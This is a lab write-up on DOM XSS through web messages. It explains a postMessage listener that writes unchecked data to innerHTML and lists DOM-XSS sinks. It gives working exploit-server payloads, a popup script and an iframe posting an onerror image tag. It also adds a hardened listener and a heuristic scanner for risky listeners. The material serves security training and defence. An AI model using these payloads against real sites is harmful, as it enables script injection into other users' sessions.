DOM XSS using Web Messages

2023/08/01 6:12PM

Description

This lab demonstrates a simple web message vulnerability. To solve this lab, use the exploit server to post a message to the target site that causes the `print()` function to be called.

This lab involves `postMessage`. The Chrome extension at https://github.com/fransr/postMessage-tracker is excellent and should be used when hunting for bugs: it monitors `postMessage` listeners and shows an indicator with the number of listeners in the current window.

Getting Started

When the page loads, the Chrome extension indicates that there is one `postMessage` listener in the current window.

Vulnerability

The Chrome extension shows us the `postMessage` listener code and tells us that it is located on line 53.

The code below registers a `postMessage` listener that takes `e.data` from the incoming message and writes it straight into the sink `document.getElementById('ads').innerHTML`. This is an issue because `.innerHTML` is a sink that can be used for DOM XSS, and the listener never checks `e.origin`, so a message from any origin is accepted.


    <script>
        window.addEventListener('message', function(e) {
            document.getElementById('ads').innerHTML = e.data;
        })
    </script>
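As an added example (not the lab's code), the listener above is placed next to a hardened version: an exact-match origin allow-list plus `textContent` instead of `innerHTML`. A tiny stand-in for `window` and the target element is constructed so the comparison runs under Node; `https://trusted.example` and `https://attacker.example` are placeholder origins.

```javascript
// Added example, not the lab's code. Vulnerable listener beside a hardened
// one, driven by a constructed stand-in for window/element so it runs in Node.

// Minimal stand-in for a browser window: records 'message' listeners and
// lets us simulate a postMessage arriving from a given origin (constructed).
class FakeWindow {
  constructor() { this.listeners = []; }
  addEventListener(type, fn) {
    if (type === 'message') this.listeners.push(fn);
  }
  deliver(data, origin) {
    for (const fn of this.listeners) fn({ data, origin });
  }
}

// Vulnerable pattern from the lab: no origin check, HTML sink.
function installVulnerableListener(win, el) {
  win.addEventListener('message', function (e) {
    el.innerHTML = e.data; // any origin can inject markup here
  });
}

// Decides whether a message may be used at all. Returns the string payload
// or null when the message must be ignored.
function acceptWebMessage(event, allowedOrigins) {
  // Exact-match origin check: no indexOf/startsWith, which look-alike
  // hostnames can satisfy.
  if (!allowedOrigins.has(event.origin)) return null;
  // Only accept plain strings; objects can carry unexpected structure.
  if (typeof event.data !== 'string') return null;
  return event.data;
}

// Hardened listener: origin allow-list plus a text sink instead of innerHTML.
function installHardenedListener(win, el, allowedOrigins) {
  win.addEventListener('message', function (e) {
    const text = acceptWebMessage(e, allowedOrigins);
    if (text === null) return;
    el.textContent = text; // rendered as text, never parsed as HTML
  });
}

// Delivers the lab's payload to both listeners and reports which sink it reached.
function demo() {
  const payload = '<img src=x onerror=print()>';
  const untrusted = 'https://attacker.example'; // constructed origin
  const trusted = 'https://trusted.example';    // placeholder trusted origin

  const vulnWin = new FakeWindow();
  const vulnEl = { innerHTML: '', textContent: '' };
  installVulnerableListener(vulnWin, vulnEl);
  vulnWin.deliver(payload, untrusted);

  const safeWin = new FakeWindow();
  const safeEl = { innerHTML: '', textContent: '' };
  installHardenedListener(safeWin, safeEl, new Set([trusted]));
  safeWin.deliver(payload, untrusted);      // dropped: origin not allowed
  safeWin.deliver('Summer sale', trusted);  // accepted, rendered as text

  return {
    vulnerableInnerHTML: vulnEl.innerHTML,
    hardenedInnerHTML: safeEl.innerHTML,
    hardenedText: safeEl.textContent,
  };
}

console.log(demo());
```

The origin comparison uses a `Set` of exact origins on purpose: substring checks such as `e.origin.indexOf('trusted.example')` accept `https://trusted.example.attacker.example` as well.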

*List of Sinks that can Lead to DOM-XSS*


    document.write()
    document.writeln()
    document.domain
    element.innerHTML
    element.outerHTML
    element.insertAdjacentHTML
    element.onevent
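The sink list above can be turned into a review aid. The following is an added example (not the lab's code): a heuristic scanner that extracts each inline `message` listener from a JavaScript source and flags handlers that reach one of those HTML sinks without consulting `e.origin`. It relies on regexes and brace matching rather than a real parser, so its output is a list of review leads, not proof. The three sample sources are constructed for the demo and `https://trusted.example` is a placeholder.

```javascript
// Added example, not the lab's code: heuristic detection of risky
// web-message listeners using the sink list from the write-up.

const HTML_SINKS = [
  'document.write(', 'document.writeln(', 'document.domain',
  '.innerHTML', '.outerHTML', '.insertAdjacentHTML(',
];
// element.onevent = ... assignments (onclick, onerror, ...).
const ON_EVENT_SINK = /\.on[a-z]+\s*=/;

// Returns the body text of each 'message' listener whose handler is written
// inline (function expression or arrow). A handler passed by name is skipped,
// because following the reference would need a real parser.
function extractMessageListeners(source) {
  const bodies = [];
  const re = /addEventListener\(\s*['"]message['"]/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const open = source.indexOf('{', m.index);
    // A ';' before the first '{' means the handler was passed by name.
    if (open === -1 || source.slice(m.index, open).includes(';')) continue;
    let depth = 0;
    for (let i = open; i < source.length; i++) {
      if (source[i] === '{') depth++;
      else if (source[i] === '}' && --depth === 0) {
        bodies.push(source.slice(open, i + 1));
        break;
      }
    }
  }
  return bodies;
}

// Classifies each listener: 'high' = HTML sink and no origin check,
// 'medium' = HTML sink behind an origin check (verify the check is an exact
// comparison), 'none' = no HTML sink found.
function scanSource(source) {
  return extractMessageListeners(source).map((body) => {
    const sinks = HTML_SINKS.filter((s) => body.includes(s));
    if (ON_EVENT_SINK.test(body)) sinks.push('element.onevent');
    const checksOrigin = /\.origin\b/.test(body);
    let severity = 'none';
    if (sinks.length > 0) severity = checksOrigin ? 'medium' : 'high';
    return { sinks, checksOrigin, severity };
  });
}

// Constructed samples: the lab's listener, a hardened one, and one that
// checks origin loosely but still writes to innerHTML.
const SAMPLE_VULNERABLE = `
window.addEventListener('message', function(e) {
    document.getElementById('ads').innerHTML = e.data;
})`;

const SAMPLE_HARDENED = `
window.addEventListener('message', (e) => {
    if (e.origin !== 'https://trusted.example') return;
    document.getElementById('ads').textContent = e.data;
});`;

const SAMPLE_LOOSE_CHECK = `
window.addEventListener('message', function(e) {
    if (e.origin.indexOf('trusted.example') === -1) return;
    document.getElementById('ads').innerHTML = e.data;
});`;

console.log(scanSource(SAMPLE_VULNERABLE));
console.log(scanSource(SAMPLE_HARDENED));
console.log(scanSource(SAMPLE_LOOSE_CHECK));
```

The 'medium' bucket exists because the presence of `.origin` in a handler says nothing about how it is compared; the loose-check sample passes the scanner's origin test yet still needs a human to confirm the comparison is exact.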

Exploit

Let's craft a payload that causes the victim to execute the `print()` function. Go to the exploit server and put the following code in the `Body`.


    <script>
    window.pwned=window.open('https://[LAB_ID].web-security-academy.net/');
    window.pwned.postMessage('<img src=x onerror=print()>', '*');
    </script>

JavaScript `postMessage` calls have the following format:

    targetWindow.postMessage(message, targetOrigin, [transfer]);

Now, when a user visits our website, a new window will pop up and a `postMessage` is sent to the vulnerable website in the context of the victim. This, however, will not work because Chrome blocks popups.

Since Chrome blocks popup windows, let's use an `iframe` instead.

    <iframe src="https://[LAB_ID].web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">